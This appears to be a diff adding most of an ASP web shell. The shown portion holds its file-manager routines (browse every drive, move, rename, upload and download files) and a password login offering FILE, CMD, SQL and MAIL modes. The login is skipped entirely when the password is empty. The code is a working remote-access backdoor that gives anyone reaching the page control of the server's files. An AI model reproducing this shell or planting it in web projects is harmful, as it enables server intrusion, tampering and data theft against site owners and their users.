+next
+end if
+
+end sub
+
+'###########################################################################################
+
+sub Move()
+dim i,nfile,ndir,itemName,itemPath
+
+on error resume next
+
+mv_dst=Trim(Request.Form("mv"))
+if mv_dst="" then exit sub
+mv_dst=abspath(mv_dst)
+Session("mv_dst")=mv_dst
+
+if FSO.FolderExists(mv_dst)=false then
+gMsg="<p>Folder not exists" & vbNewLine
+exit sub
+end if
+
+ndir=Request.Form("d").Count
+nfile=Request.Form("f").Count
+
+if (ndir>0) then
+gMsg="<b>M</b>oving folder(s) to """ & mv_dst & """ ..."
+for i=1 to ndir
+itemName=Request.Form("d")(i)
+itemPath=addslash(targetPath) & itemName
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+FSO.MoveFolder itemPath,addslash(mv_dst)
+if Err.Number<>0 then gMsg=gMsg & "error" else gMsg=gMsg & "success"
+set item=nothing
+next
+end if
+
+if (nfile>0) then
+if (ndir>0) then gMsg= gMsg & "<p>" & vbNewLine
+gMsg=gMsg & "<b>M</b>oving file(s) to """ & mv_dst & """ ..."
+for i=1 to nfile
+itemName=Request.Form("f")(i)
+itemPath=addslash(targetPath) & itemName
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+FSO.MoveFile itemPath,addslash(mv_dst)
+if Err.Number<>0 then gMsg=gMsg & "error" else gMsg=gMsg & "success"
+next
+end if
+end sub
+
+'###########################################################################################
+
+sub RenameItem()
+dim item,itemType,itemName,itemPath
+dim param,newName
+
+itemType=request.form("command")
+param=split(request.form("param"),"|")
+itemName=param(0)
+newName=param(1)
+itemPath=addslash(targetPath) & newName
+
+on error resume next
+
+select case itemType
+case "RenameFolder"
+if (FSO.FolderExists(itemPath)=false) and (FSO.FileExists(itemPath)=false) then
+itemPath=addslash(targetPath) & itemName
+set item=FSO.GetFolder(itemPath)
+item.Name=newName
+if Err.Number<>0 then
+gMsg="Unable to rename the folder """ & itemName & """, an error occured..."
+else
+gMsg="Renamed the folder """ & itemName & """ to """ & newName & """..."
+end if
+else
+gMsg="Unable to rename the folder """ & itemName & """, there exists a file or a folder with the new name """ & newName & """..."
+end if
+case "RenameFile"
+if (FSO.FolderExists(itemPath)=false) and (FSO.FileExists(itemPath)=false) then
+itemPath=addslash(targetPath) & itemName
+set item=FSO.GetFile(itemPath)
+item.Name=newName
+if Err.Number<>0 then
+gMsg="Unable to rename the file """ & itemName & """, an error occured..."
+else
+gMsg="Renamed the file """ & itemName & """ to """ & newName & """..."
+end if
+else
+gMsg="Unable to rename the file """ & itemName & """, there exists a file or a folder with the new name """ & newName & """..."
+end if
+end select
+
+set item=nothing
+end sub
+
+'###########################################################################################
+
+sub List()
+dim objFolder,folder,item,intCount,bOpen,ext,count
+if not FSO.FolderExists(targetPath) then
+gMsg="Folder not found"
+else
+on error resume next
+set objFolder=FSO.GetFolder(targetPath)
+if Err.Number<>0 then
+gMsg="Can't open folder"
+else
+intCount=objFolder.SubFolders.Count+objFolder.Files.Count
+if Err.Number<>0 then
+gMsg="Permission denied"
+else
+%>
+<input type=button value=Refresh onclick="Command('Refresh')">
+<input type=button value="New File" onclick="Command('NewFile')">
+<input type=button value="New Folder" onclick="Command('NewFolder')">
+<input type=button value=Upload onclick="frmUpload.max.focus()">
+<input type=button value=Tree onclick="Command('Tree')">
+<%
+bOpen=true
+end if
+end if
+end if
+HtmlQuick()
+if gMsg<>"" then Response.Write "<p>" & gMsg & vbNewLine
+if bOpen then
+count=0
+if intCount>0 then Response.Write "<p>" & objFolder.SubFolders.Count & " subfolder(s)<br>" & vbNewLine & objFolder.Files.Count & " file(s)<br>" & vbNewLine
+if bSize then Response.Write "(" & FormatSize(objFolder.Size) & ")<br>" & vbNewLine
+%>
+<p>
+<table border=1 width=100%>
+<tr>
+<td><b>N</b>ame</td>
+<td align=center><b>S</b>ize</td>
+<td align=center><b>T</b>ype</td>
+<td align=center><b>M</b>odified</td>
+<td><b>A</b>ttributes</td>
+<td><b>A</b>ctions</td>
+<tr>
+<%
+if not isroot(targetPath) then
+%>
+<tr>
+<td><a href="javascript:Command('LevelRoot')" title="Up Root Level">\</a></td>
+<td> </td>
+<td align=center>Root</td>
+<td> </td>
+<td> </td>
+<td> </td>
+</tr>
+<tr>
+<td><a href="javascript:Command('LevelUp')" title="Up One level">..</a></td>
+<td> </td>
+<td align=center>Up</td>
+<td> </td>
+<td> </td>
+<td> </td>
+</tr>
+<%
+end if
+if intCount>0 then
+HtmlJsForm()
+%>
+<form name=theForm method=post action="<%=gURL%>">
+<input type=hidden name=command value="">
+<input type=hidden name=folder value="<%=targetPath%>">
+<%
+for each item in objFolder.SubFolders
+count=count+1
+Response.Write "<tr>" & vbNewLine
+Response.Write " <td><a href=""javascript:Command('OpenFolder',"" & item.Name & "")""" 
+if Len(item.Name)>gMax then Response.Write " title=""" & item.Name & """"
+Response.Write ">" & FormatName(item.Name) & "</a></td>" & vbNewLine
+Response.Write " <td align=right> </td>" & vbNewLine
+Response.Write " <td align=center>DIR</td>" & vbNewLine
+Response.Write " <td align=center>" & FormatDate(item.DateLastModified ) & "</td>" & vbNewLine
+Response.Write " <td>" & GetAttributes(item.Attributes) & "</td>" & vbNewLine
+Response.Write " <td><input type=checkbox name=d value=""" & item.Name & """><input type=button value=Ren onclick=""Command('RenameFolder',"" & item.Name & "")""><input type=button value=Attr onclick=""Command('ChangeAttributesFolder',"" & item.Name & "")""></td>" & vbNewLine
+Response.Write "</tr>" & vbNewLine
+next
+for each item in objFolder.Files
+count=count+1
+Response.Write "<tr>" & vbNewLine
+Response.Write " <td><a href=""javascript:Command('Download',"" & item.Name & "")"""
+ext=FSO.GetExtensionName(addslash(targetPath) & item.Name)
+re.IgnoreCase = true
+re.Pattern = "^" & ext & ",|," & ext & ",|," & ext & "$"
+if re.Test(lnkExt) then
+Response.Write " title=""-> " & Server.Htmlencode(FindLink(addslash(targetPath) & item.Name)) & """"
+elseif Len(item.Name)>gMax then
+Response.Write " title=""" & item.Name & """"
+end if
+
+Response.Write ">" & FormatName(item.Name) & "</td>" & vbNewLine
+Response.Write " <td align=right>" & FormatSize(item.Size) & "</td>" & vbNewLine
+Response.Write " <td align=center>" & item.Type & "</td>" & vbNewLine
+Response.Write " <td align=center>" & FormatDate(item.DateLastModified ) & "</td>" & vbNewLine
+Response.Write " <td>" & GetAttributes(item.Attributes) & "</td>" & vbNewLine
+Response.Write " <td><input type=checkbox name=f value=""" & item.Name & """><input type=button value=Ren onclick=""Command('RenameFile',"" & item.Name & "")""><input type=button value=Attr onclick=""Command('ChangeAttributesFile',"" & item.Name & "")"">"
+
+if re.Test(editExt) then
+Response.Write "<input type=button value=Edit onclick=""Command('Edit',"" & item.Name & "")"">"
+end if
+
+if Lcase(ext)="zip" then
+Response.Write "<input type=button value=Info onclick=""Command('ZipInfo',"" & item.Name & "")"">"
+end if
+
+Response.Write "</td>" & vbNewLine
+Response.Write "</tr>" & vbNewLine
+next
+if count>0 then
+%>
+<tr>
+<td> </td>
+<td> </td>
+<td> </td>
+<td> </td>
+<td> </td>
+<td><input type=checkbox name=allbox title="Select All" onclick="CheckAll()"><input type=button value=Delete title="Delete Selected Item(s)" onclick="DoWork('Delete')"></td>
+</tr>
+<%
+end if
+%>
+</table>
+<%
+if count>1 then
+%>
+<p>
+<table>
+<tr><td><b>C</b>opy selected item(s) to</td><td><input type=text name=cp value="<%=Session("cp_dst")%>" size=50 onkeydown=" if (event.keyCode==13) theForm.cp_bt.click();"> <input type=button id=cp_bt value=Copy onclick="DoWork('Copy')"></td></tr>
+<tr><td><b>M</b>ove selected item(s) to</td><td><input type=text name=mv value="<%=Session("mv_dst")%>" size=50 onkeydown=" if (event.keyCode==13) theForm.mv_bt.click();"> <input type="button" id=mv_bt value=Move onclick="DoWork('Move')"></td></tr>
+</table>
+<%
+end if
+%>
+</form>
+</table>
+<%
+end if
+set objFolder=nothing
+%>
+<p><b>U</b>pload file(s) to "<%=targetPath%>"
+<form name=frmUpload method=post enctype="multipart/form-data" action="<%=gURL%>">
+<input type=hidden name=folder value="<%=targetPath%>">
+Max: <input type=text name=max value=5 size=5> <input type=button value=# onclick="setid()"><br>
+<table>
+<tr>
+<td id=upid>
+</td>
+</tr>
+</table>
+<input type=submit value=Upload>
+</form>
+<script>
+setid();
+function setid() {
+str='<br>';
+if (frmUpload.max.value<=0) frmUpload.max.value=1;
+for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input type=file name=file'+i+'><br>';
+upid.innerHTML=str+'<br>';
+}
+</script>
+<%
+end if
+%>
+<form name=frmFile method=post action="<%=gURL%>">
+<input type=hidden name=command value="">
+<input type=hidden name=param value="">
+<input type=hidden name=folder value="<%=targetPath%>">
+</form>
+<script>frmAddress.param.focus()</script>
+<%
+HtmlJsCommand()
+end sub
+
+'###########################################################################################
+
+sub Upload()
+dim objUpload,f,max,i,name,path,size,success
+
+HtmlHeader("")
+HtmlMode()
+
+set objUpload=New clsUpload
+
+targetPath=objUpload.Fields("folder").Value
+max=objUpload.Fields("max").Value
+
+gMsg= "<b>U</b>pload..." & vbNewLine
+
+for i=1 to max
+name=objUpload.Fields("file" & i).FileName
+size=objUpload.Fields("file" & i).Length
+if (name<>"") and (size>0) then
+gMsg=gMsg & "<br>" & vbNewLine & "- " & name & " (" & FormatNumber(size,0) & " bytes): "
+path=addslash(targetPath) & name
+objUpload.Fields("file" & i).SaveAs path
+if FSO.FileExists(path) then
+on error resume next
+set f=FSO.GetFile(path)
+if IsObject(f) then
+if f.Size=size then success=true else success=false
+end if
+set f=nothing
+end if
+if success then gMsg=gMsg & "success" else gMsg = gMsg & "fail"
+end if
+next
+
+set objUpload=nothing
+
+List()
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub Download()
+dim oStream
+dim szFileName
+szFileName=addslash(Request.Form("folder")) & Request.form("Param")
+if FSO.FileExists(szFileName) then
+set oStream=Server.CreateObject("ADODB.Stream")
+oStream.Type=1
+oStream.Open
+on error resume next
+oStream.LoadFromFile(szFileName)
+if Err.Number=0 then
+Response.AddHeader "Content-Disposition", "attachment; filename=" & FSO.GetFileName(szFileName)
+Response.AddHeader "Content-Length", oStream.Size
+Response.ContentType="bad/type" 'yeu cau ie hien hop thoai save-as
+Response.BinaryWrite oStream.Read
+end if
+oStream.Close
+set oStream=nothing
+end if
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub Logout()
+Session.Abandon
+Response.Redirect gURL
+Destroy()
+end sub
+
+sub Init()
+Session("switch")=false
+set FSO=Server.CreateObject("Scripting.FileSystemObject")
+set re=new regexp
+end sub
+
+sub Destroy()
+set FSO=nothing
+set re=nothing
+Response.End
+end sub
+
+'###########################################################################################
+
+sub Secure()
+if (Session("allow")=1) then exit sub
+if (gPassword="") then
+Session("allow")=1
+Session("mode")=0
+exit sub
+end if
+if (Request.Form("command")="Login") then
+if Request.Form("password")=gPassword then
+Session("allow")=1
+Session("mode")=CInt(Request.Form("mode"))
+exit sub
+end if
+end if
+
+HtmlHeader("")
+%>
+<form name=frmLogin method=post action="<%=gURL%>">
+<table>
+<tr>
+<td><b>M</b>ode:</td>
+<td>
+<select name=mode>
+<option value=0 selected>FILE
+<option value=1>CMD
+<option value=2>SQL
+<option value=3>MAIL
+</select>
+</td>
+</tr>
+<tr>
+<td><b>P</b>assword:</td>
+<td><input type=password name=password></td>
+</tr>
+<tr>
+<td colspan=2><input type=submit name=command value=Login></td>
+</tr>
+</table>
+</form>
+<script>frmLogin.password.focus()</script>
+<%
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub HtmlJsForm()
+%>
+<script>
+function CheckAll() {
+var fmobj=document.theForm;
+for (var i=0; i<fmobj.elements.length;i++) {
+var e=fmobj.elements<i>;
+if ((e.name!='allbox') && (e.type=='checkbox') && (!e.disabled)) {
+e.checked=fmobj.allbox.checked;
+}
+}
+if (fmobj.allbox.checked) {
+fmobj.allbox.title='Clear All';
+} else {
+fmobj.allbox.title='Select All';
+}
+}
+
+function DoWork(cmd) {
+var s;
+var fmobj=document.theForm;
+var total=0;
+for (var i=0; i<fmobj.elements.length; i++) {
+var e=fmobj.elements<i>;
+if ((e.name!='allbox') && (e.type=='checkbox') && (e.checked)) total++;
+}
+
+if (total<1) return;
+
+s=(total>1)?'s':'';
+
+switch (cmd) {
+case "Delete":
+if (!confirm('Are you sure to delete ' + total + ' selected item' + s + ' ?')) return;
+break;
+case "Move":
+var mv=fmobj.mv.value;
+var re1=/^\s*[A-Z]{1}:[^\"\*\?\<\>\|]*\s*$/gi;
+var re2=/^\s*:{1}[^\s]+/gi;
+if (mv=='') return;
+if ( re1.test(mv) || re2.test(mv) ){
+if (!confirm('Are you sure to move ' + total + ' selected item' + s + ' to "' + mv + '" ?')) return;
+} else {
+alert('Invalid path name !');
+return;
+}
+break;
+case "Copy":
+var cp=fmobj.cp.value;
+var re1=/^\s*[A-Z]{1}:[^\"\*\?\<\>\|]*\s*$/gi;
+var re2=/^\s*:{1}[^\s]+/gi;
+if (cp=='') return;
+if ( re1.test(cp) || re2.test(cp) ) {
+} else {
+alert('Invalid path name !');
+return;
+}
+break;
+default:
+return;
+}
+
+fmobj.command.value=cmd;
+fmobj.submit();
+}
+</script>
+<%
+end sub
+
+'###########################################################################################
+
+sub HtmlJsCommand()
+%>
+<script>
+function openWin(winName, urlLoc, w, h, showStatus, isViewer) {
+l = (screen.availWidth - w)/2;
+t = (screen.availHeight - h)/2;
+features = "toolbar=no"; // yes|no 
+features += ",location=no"; // yes|no 
+features += ",directories=no"; // yes|no 
+features += ",status=" + (showStatus?"yes":"no"); // yes|no 
+features += ",menubar=no"; // yes|no 
+features += ",scrollbars=" + (isViewer?"yes":"no"); // auto|yes|no 
+features += ",resizable=" + (isViewer?"yes":"no"); // yes|no 
+features += ",dependent"; // close the parent, close the popup, omit if you want otherwise 
+features += ",height=" + h;
+features += ",width=" + w;
+features += ",left=" + l;
+features += ",top=" + t;
+winName = winName.replace(/[^a-z]/gi,"_");
+return window.open(urlLoc,winName,features);
+} 
+
+function createPage (theWin, cmd, param){
+frmFile.target = theWin.name;
+frmFile.command.value = cmd;
+frmFile.param.value = param;
+frmFile.submit();
+}
+
+function CheckName(str) {
+var re;
+re = /[\\/:*?"<>|]/gi;
+if (re.test(str)) return false; 
+else return true;
+} 
+
+function Command(cmd, param) {
+var str;
+var someWin;
+switch (cmd) {
+case "Tree":
+str = prompt("Please enter a name for the folder to tree", frmFile.folder.value);
+if (!str) return;
+var re1=/^\s*[A-Z]{1}:[^\"\*\?\<\>\|]*\s*$/gi;
+var re2=/^\s*:{1}[^\s]+/gi;
+if (re1.test(str) || re2.test(str)) {
+var winName=cmd + document.forms.frmFile.param.value;
+param=str;
+document.forms.frmFile.param.value=param;
+winName=winName.replace(/[^a-z]/gi,"_");
+someWin=window.open("", winName, "toolbar=yes,location=no,directories=no,status=yes,menubar=yes,scrollbars=yes,resizable=yes");
+someWin.focus();
+createPage(someWin,cmd,param);
+someWin = null;
+return;
+}
+else {
+alert('Invalid path name !');
+return;
+}
+break;
+case "NewFile":
+str = prompt("Please enter a name for the new file", "New File");
+if(!str) return;
+else if (!CheckName(str)) {alert("File name can not contain any of the\nfollowing characters: \\ / : * ? \" < > |"); return;}
+frmFile.param.value = str;
+break;
+case "NewFolder":
+str = prompt("Please enter a name for the new folder", "New Folder");
+if(!str) return;
+else if (!CheckName(str)) {alert("Folder name can not contain any of the\nfollowing characters: \\ / : * ? \" < > |"); return;}
+frmFile.param.value = str;
+break;
+case "RenameFile":
+str = prompt("Please enter the new name for the file", param);
+if (!str || (str==param)) return;
+else if (!CheckName(str)) {alert("File name can not contain any of the\nfollowing characters: \\ / : * ? \" < > |"); return;}
+frmFile.param.value = param + "|" + str;
+break;
+case "RenameFolder":
+str = prompt("Please enter the new name for the folder", param);
+if (!str || (str==param)) return;
+else if (!CheckName(str)) {alert("Folder name can not contain any of the\nfollowing characters: \\ / : * ? \" < > |"); return;}
+frmFile.param.value = param + "|" + str;
+break;
+case "Edit":
+str = frmFile.folder.value + param;
+someWin = openWin(cmd + str, "", 600, 440, true, false);
+someWin.focus();
+createPage(someWin,cmd,param);
+someWin = null;
+return;
+break;
+case "ChangeAttributesFile":
+case "ChangeAttributesFolder":
+str = frmFile.folder.value + param;
+someWin = openWin(cmd + str, "", 300, 160, true, false);
+someWin.focus();
+createPage(someWin,cmd,param);
+someWin = null;
+return;
+break;
+case "ZipInfo":
+var winName=cmd + document.forms.frmFile.folder.value + param;
+winName=winName.replace(/[^a-z]/gi,"_");
+someWin=window.open("", winName, "toolbar=yes,location=no,directories=no,status=yes,menubar=yes,scrollbars=yes,resizable=yes");
+someWin.focus();
+createPage(someWin,cmd,param);
+someWin = null;
+return;
+break
+default:
+frmFile.param.value = param;
+}
+frmFile.target = "";
+frmFile.command.value = cmd
+frmFile.submit(); 
+}
+</script>
+<%
+end sub
+
+sub HtmlJsEditor()
+%>
+<script>
+function EditorCommand (cmd) {
+switch (cmd) {
+case "WordWrap":
+if (frmFile.wrap.checked) frmFile.content.wrap="soft";
+else frmFile.content.wrap="off";
+frmFile.content.focus();
+break;
+case "Reload":
+frmFile.reset();
+break;
+case "Save":
+frmFile.subcommand.value = "Save";
+frmFile.submit();
+break;
+case "SaveAs":
+var str, oldname;
+oldname = frmFile.param.value;
+str = prompt("Save the file as :", oldname);
+if (!str || str==oldname) return;
+frmFile.param.value = str;
+frmFile.subcommand.value = "SaveAs";
+frmFile.submit();
+break;
+}
+}
+</script>
+<%
+end sub
+
+sub HtmlQuick()
+%>
+<form name=frmQuick method=post action="<%=gURL%>">
+<input type=hidden name=command value=OpenFolder>
+<select name=param onchange="frmQuick.submit()">
+<%
+dim dc,d,dName,dType
+set dc=FSO.Drives
+for each d in dc
+dName=d.DriveLetter&":\"
+select case d.DriveType
+case 0 dType="Unknown"
+case 1 if d.driveletter="A" then dType="?" else dType="?"
+dType=dType&" Floppy" 'maybe wrong
+case 2 dType="HDD " & FormatSize(d.TotalSize)
+case 3 dType="Network"
+case 4
+dType="CD-ROM"
+if not d.IsReady then dType=dType & " - not ready"
+case 5
+dType="RAM Disk"
+end select
+Response.Write "<option value=""" & dName & """"
+if d.DriveLetter=Ucase(Left(targetPath,1)) then Response.Write " selected"
+Response.Write ">" & dName& " (" & dType & ")" & vbNewLine
+next
+set dc=nothing
+%>
+</select>
+</form>
+<form name=frmAddress method=post action="<%=gURL%>">
+<input type=hidden name=command value=OpenFolder>
+<b>A</b>ddress: <input type=text name=param value="<%=targetPath%>" size=90> <input type=submit value=Go>
+</form>
+<%
+end sub
+
+sub HtmlMode()
+%>
+<table>
+<tr>
+<td>
+<form name=frmChangeMode method=post action="<%=gURL%>">
+<input type=hidden name=command value=ChangeMode>
+<select name=mode onchange="frmChangeMode.submit()">
+<option value=0<%if Session("mode")=0 then Response.Write " selected"%>>FILE
+<option value=1<%if Session("mode")=1 then Response.Write " selected"%>>CMD
+<option value=2<%if Session("mode")=2 then Response.Write " selected"%>>SQL
+<option value=3<%if Session("mode")=3 then Response.Write " selected"%>>MAIL
+</select>
+</form>
+</td>
+<%
+if gPassword<>"" then
+%>
+<td>
+<form name=frmLogout method=post action="<%=gURL%>">
+<input type=submit name=command value=Logout>
+</form>
+</td>
+<%
+end if
+%>
+</tr>
+</table>
+<%
+end sub
+
+'###########################################################################################
+
+sub HtmlHeader(strTitle)
+%>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
+<title><%=strTitle%></title>
+<style>
+select,input{font-family:Verdana;font-size:9pt}
+</style>
+</head>
+<body>
+<%
+end sub
+
+'###########################################################################################
+
+sub HtmlFooter()
+%>
+</body>
+</html>
+<%
+end sub
+
+'###########################################################################################
+
+function abspath(path)
+if left(path,1)=":" then abspath=Server.MapPath(mid(path,2)) else abspath=FSO.GetAbsolutePathName(path)
+end function
+
+'###########################################################################################
+
+function addslash(path)
+if right(path,1)="\" then addslash=path else addslash=path & "\"
+end function
+
+'###########################################################################################
+
+function findroot(path)
+dim f
+
+set f=FSO.GetFolder(path)
+
+if f.IsRootFolder then
+else
+do until f.IsRootFolder
+set f=f.ParentFolder
+loop
+end if
+findroot=f.Path
+set f=nothing
+end function
+
+'###########################################################################################
+
+function isroot(path)
+dim f
+set f=FSO.GetFolder(path)
+isroot=f.IsRootFolder
+set f=nothing
+end function
+
+'###########################################################################################
+
+Function FindLink(szFileName)
+Dim WshShell, oLink
+
+Set WshShell=Server.CreateObject("WScript.Shell")
+Set oLink=WshShell.CreateShortcut(szFileName)
+
+FindLink=oLink.TargetPath
+
+Set oLink=Nothing
+Set WshShell=Nothing
+End Function
+
+'###########################################################################################
+
+Function FormatSize(intSize)
+If (intSize < 1024) Then
+FormatSize = intSize & " B"
+ElseIf (intSize < 1024*1024) Then
+FormatSize = FormatNumber(intSize/1024,2) & " KB"
+ElseIf (intSize < 1024*1024*1024) Then
+FormatSize = FormatNumber(intSize/(1024*1024),2) & " MB"
+Else
+FormatSize = FormatNumber(intSize/(1024*1024*1024),2) & " GB"
+End If
+End Function
+
+'###########################################################################################
+
+Function FormatName(szName)
+FormatName = szName
+If gMax > 5 And Len(szName) > gMax Then FormatName = Left(szName,gMax-2) & "..."
+End Function
+
+'###########################################################################################
+
+function FormatDate(strDate)
+dim int12HourPart,strAMPM
+int12HourPart=DatePart("h",strDate) mod 12
+if int12HourPart=0 then int12HourPart=12
+if DatePart("h",strDate)>=12 then strAMPM="PM" else strAMPM="AM"
+FormatDate=Right("0"&DatePart("d",strDate),2) & "/" & Right("0"&DatePart("m",strDate),2) & "/" & DatePart("yyyy",strDate) & " " & Right("0"&int12HourPart,2) & ":" & Right("0"&DatePart("n",strDate),2) & ":" & Right("0"&DatePart("s",strDate),2) & " " & strAMPM
+end function
+
+'###########################################################################################
+
+Function GetAttributes(intAttr)
+Dim strAttributes
+strAttributes=""
+If (intAttr And 1) > 0 Then strAttributes = "R"
+If (intAttr And 2) > 0 Then strAttributes=strAttributes & "H"
+If (intAttr And 4) > 0 Then strAttributes=strAttributes & "S"
+If (intAttr And 32) > 0 Then strAttributes=strAttributes & "A"
+If (intAttr And 2048) > 0 Then strAttributes=strAttributes & "C"
+if strAttributes="" then strAttributes=" "
+GetAttributes=strAttributes
+End Function
+
+'###########################################################################################
+
+Class clsField
+Public Name
+Private mstrPath
+Public FileDir
+Public FileExt
+Public FileName
+Public ContentType
+Public Value
+Public BinaryData
+Public Length
+Private mstrText
+
+Public Property Get BLOB()
+BLOB = BinaryData
+End Property
+
+Public Function BinaryAsText()
+Dim lbinBytes
+Dim lobjRs
+If Length = 0 Then Exit Function
+If LenB(BinaryData) = 0 Then Exit Function
+
+If Not Len(mstrText) = 0 Then
+BinaryAsText = mstrText
+Exit Function
+End If
+lbinBytes = ASCII2Bytes(BinaryData)
+mstrText = Bytes2Unicode(lbinBytes)
+BinaryAsText = mstrText
+End Function
+
+Public Sub SaveAs(ByRef pstrFileName)
+Const adTypeBinary=1
+Const adSaveCreateOverWrite=2
+Dim lobjStream
+Dim lobjRs
+Dim lbinBytes
+If Length = 0 Then Exit Sub
+If LenB(BinaryData) = 0 Then Exit Sub
+Set lobjStream = Server.CreateObject("ADODB.Stream")
+lobjStream.Type = adTypeBinary
+Call lobjStream.Open()
+lbinBytes = ASCII2Bytes(BinaryData)
+Call lobjStream.Write(lbinBytes)
+On Error Resume Next
+Call lobjStream.SaveToFile(pstrFileName, adSaveCreateOverWrite)
+Call lobjStream.Close()
+Set lobjStream = Nothing
+End Sub
+
+Public Property Let FilePath(ByRef pstrPath)
+mstrPath = pstrPath
+If Not InStrRev(pstrPath, ".") = 0 Then
+FileExt = Mid(pstrPath, InStrRev(pstrPath, ".") + 1)
+FileExt = UCase(FileExt)
+End If
+If Not InStrRev(pstrPath, "\") = 0 Then
+FileName = Mid(pstrPath, InStrRev(pstrPath, "\") + 1)
+End If
+If Not InStrRev(pstrPath, "\") = 0 Then
+FileDir = Mid(pstrPath, 1, InStrRev(pstrPath, "\") - 1)
+End If
+End Property
+
+Public Property Get FilePath()
+FilePath = mstrPath
+End Property
+
+Private Function ASCII2Bytes(ByRef pbinBinaryData)
+Const adLongVarBinary=205
+Dim lobjRs
+Dim llngLength
+Dim lbinBuffer
+llngLength = LenB(pbinBinaryData)
+Set lobjRs = Server.CreateObject("ADODB.Recordset")
+Call lobjRs.Fields.Append("BinaryData", adLongVarBinary, llngLength)
+Call lobjRs.Open()
+Call lobjRs.AddNew()
+Call lobjRs.Fields("BinaryData").AppendChunk(pbinBinaryData & ChrB(0))
+Call lobjRs.Update()
+lbinBuffer = lobjRs.Fields("BinaryData").GetChunk(llngLength)
+Call lobjRs.Close()
+Set lobjRs = Nothing
+ASCII2Bytes = lbinBuffer
+End Function
+
+Private Function Bytes2Unicode(ByRef pbinBytes)
+Dim lobjRs
+Dim llngLength
+Dim lstrBuffer
+llngLength = LenB(pbinBytes)
+Set lobjRs = Server.CreateObject("ADODB.Recordset")
+Call lobjRs.Fields.Append("BinaryData", adLongVarChar, llngLength)
+Call lobjRs.Open()
+Call lobjRs.AddNew()
+Call lobjRs.Fields("BinaryData").AppendChunk(pbinBytes)
+Call lobjRs.Update()
+lstrBuffer = lobjRs.Fields("BinaryData").Value
+Call lobjRs.Close()
+Set lobjRs = Nothing
+Bytes2Unicode = lstrBuffer
+End Function
+End Class
+
+'###########################################################################################
+
+Class clsUpload
+Private mbinData
+Private mlngChunkIndex
+Private mlngBytesReceived
+Private mstrDelimiter
+Private CR
+Private LF
+Private CRLF
+Private mobjFieldAry()
+Private mlngCount
+
+Private Sub RequestData
+Dim llngLength
+mlngBytesReceived = Request.TotalBytes
+mbinData = Request.BinaryRead(mlngBytesReceived)
+End Sub
+
+Private Sub ParseDelimiter()
+mstrDelimiter = MidB(mbinData, 1, InStrB(1, mbinData, CRLF) - 1)
+End Sub
+
+Private Sub ParseData()
+Dim llngStart
+Dim llngLength
+Dim llngEnd
+Dim lbinChunk
+llngStart = 1
+llngStart = InStrB(llngStart, mbinData, mstrDelimiter & CRLF)
+While Not llngStart = 0
+llngEnd = InStrB(llngStart + 1, mbinData, mstrDelimiter) - 2
+llngLength = llngEnd - llngStart
+lbinChunk = MidB(mbinData, llngStart, llngLength)
+Call ParseChunk(lbinChunk)
+llngStart = InStrB(llngStart + 1, mbinData, mstrDelimiter & CRLF)
+Wend
+End Sub
+
+Private Sub ParseChunk(ByRef pbinChunk)
+Dim lstrName
+Dim lstrFileName
+Dim lstrContentType
+Dim lbinData
+Dim lstrDisposition
+Dim lstrValue
+lstrDisposition = ParseDisposition(pbinChunk)
+lstrName = ParseName(lstrDisposition)
+lstrFileName = ParseFileName(lstrDisposition)
+lstrContentType = ParseContentType(pbinChunk)
+If lstrContentType = "" Then
+lstrValue = CStrU(ParseBinaryData(pbinChunk))
+Else
+lbinData = ParseBinaryData(pbinChunk)
+End If
+Call AddField(lstrName, lstrFileName, lstrContentType, lstrValue, lbinData)
+End Sub
+
+Private Sub AddField(ByRef pstrName, ByRef pstrFileName, ByRef pstrContentType, ByRef pstrValue, ByRef pbinData)
+Dim lobjField
+ReDim Preserve mobjFieldAry(mlngCount)
+Set lobjField = New clsField
+lobjField.Name = pstrName
+lobjField.FilePath = pstrFileName 
+lobjField.ContentType = pstrContentType
+If LenB(pbinData) = 0 Then
+lobjField.BinaryData = ChrB(0)
+lobjField.Value = pstrValue
+lobjField.Length = Len(pstrValue)
+Else
+lobjField.BinaryData = pbinData
+lobjField.Length = LenB(pbinData)
+lobjField.Value = ""
+End If
+Set mobjFieldAry(mlngCount) = lobjField
+mlngCount = mlngCount + 1
+End Sub
+
+Private Function ParseBinaryData(ByRef pbinChunk)
+Dim llngStart
+llngStart = InStrB(1, pbinChunk, CRLF & CRLF)
+If llngStart = 0 Then Exit Function
+llngStart = llngStart + 4
+ParseBinaryData = MidB(pbinChunk, llngStart)
+End Function
+
+Private Function ParseContentType(ByRef pbinChunk)
+Dim llngStart
+Dim llngEnd
+Dim llngLength
+llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Type:"), vbTextCompare)
+If llngStart = 0 Then Exit Function
+llngEnd = InStrB(llngStart + 15, pbinChunk, CR)
+If llngEnd = 0 Then Exit Function
+llngStart = llngStart + 15
+If llngStart >= llngEnd Then Exit Function
+llngLength = llngEnd - llngStart
+ParseContentType = Trim(CStrU(MidB(pbinChunk, llngStart, llngLength)))
+End Function
+
+Private Function ParseDisposition(ByRef pbinChunk)
+Dim llngStart
+Dim llngEnd
+Dim llngLength
+llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Disposition:"), vbTextCompare)
+If llngStart = 0 Then Exit Function
+llngEnd = InStrB(llngStart + 22, pbinChunk, CRLF)
+If llngEnd = 0 Then Exit Function
+llngStart = llngStart + 22
+If llngStart >= llngEnd Then Exit Function
+llngLength = llngEnd - llngStart
+ParseDisposition = CStrU(MidB(pbinChunk, llngStart, llngLength))
+End Function
+
+Private Function ParseName(ByRef pstrDisposition)
+Dim llngStart
+Dim llngEnd
+Dim llngLength
+llngStart = InStr(1, pstrDisposition, "name=""", vbTextCompare)
+If llngStart = 0 Then Exit Function
+llngEnd = InStr(llngStart + 6, pstrDisposition, """")
+If llngEnd = 0 Then Exit Function
+llngStart = llngStart + 6
+If llngStart >= llngEnd Then Exit Function
+llngLength = llngEnd - llngStart
+ParseName = Mid(pstrDisposition, llngStart, llngLength)
+End Function
+' ------------------------------------------------------------------------------
+Private Function ParseFileName(ByRef pstrDisposition)
+Dim llngStart
+Dim llngEnd
+Dim llngLength
+llngStart = InStr(1, pstrDisposition, "filename=""", vbTextCompare)
+If llngStart = 0 Then Exit Function
